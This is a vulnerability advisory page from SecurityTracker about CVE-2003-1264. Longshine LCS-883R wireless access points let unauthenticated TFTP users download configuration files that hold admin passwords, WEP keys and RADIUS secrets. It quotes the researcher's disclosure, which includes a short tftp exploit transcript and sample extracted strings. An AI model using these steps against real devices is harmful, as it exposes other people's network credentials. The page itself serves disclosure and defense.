SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Longshine Wireless Access Point Vendors:   Longshine Technologie
Longshine Wireless Access Point Discloses Passwords to Remote Users
SecurityTracker Alert ID:  1005897
SecurityTracker URL:  http://securitytracker.com/id/1005897
CVE Reference:   CVE-2003-1264   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jan 7 2003
Impact:   Disclosure of authentication information, Disclosure of system information
Exploit Included:  Yes  
Version(s): LCS-883R-AC-B; 03.01.0b, 03.01.0h
Description:   An authentication information disclosure vulnerability was reported in the Longshine LCS-883R-AC-B Wireless Access Point router. A remote user can obtain the device passwords.

It is reported that a remote user can access the device via TFTP and download configuration files containing the username and password for the device, the WEP encryption secret key, and the RADIUS password. According to the report, this information can be obtained from both the wireless and Ethernet interfaces.

A demonstration exploit transcript is provided:

tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

An example of the 'config.img' contents is provided in the Source Message.

Other files, including 'wbtune.dat', 'mac.dat', 'rom.img', and 'normal.img' can be obtained.

The vendor has reportedly been notified.

Impact:   A remote user can obtain the device password, WEB secret, and other information from the device.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.longshine.de/produkt/wireless/883R-AC.htm (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Longshine WLAN Access-Point LCS-883R VU#310201




Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps 

Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.

Description: Get Superuser Privileges and view the devices password and password and other passwords 

Versions affected: tested with  03.01.0b and 03.01.0h

Vendor contacted: e-mailed Longshine at Sun Dec 29 

Details: You are able to connect via tftp to the access-point an you can get download the configuration
without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
In this configuration in the Username of the Superuser and the corresponding password stored.
The WEP Secret for the encryption and the password from your radius server is also readable.
This "attack" works via WLAN (!!!) and Ethernet.

tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/-\>strings config.img 
DNXLABAP01 <- name of the AP
root	   <- name of the superuser
XXXXXX123  <- password from superuser
DNXLABLAN  <- ssid
secu9	   <- secret for WEP
7890abcdef <-

You are also able to get the following files:

config.img 
wbtune.dat
mac.dat
rom.img
normal.img


Solution: after contact with the vendor he claims that a new firmware-upgrade 
fixes this problem, but the latest available firmware on his web-page 
dosn't fix it anyway.

Vendor-Contact:

LONGSHINE  Technologie (Europe) GmbH

An der Strusbek 9
D-22926 Ahrensburg

Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109

support@longshine.de
-- 
Regards
    Lukas Grunwald aka REG lg1
    
 DN-Systems Enterprise Internet Solutions GmbH

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC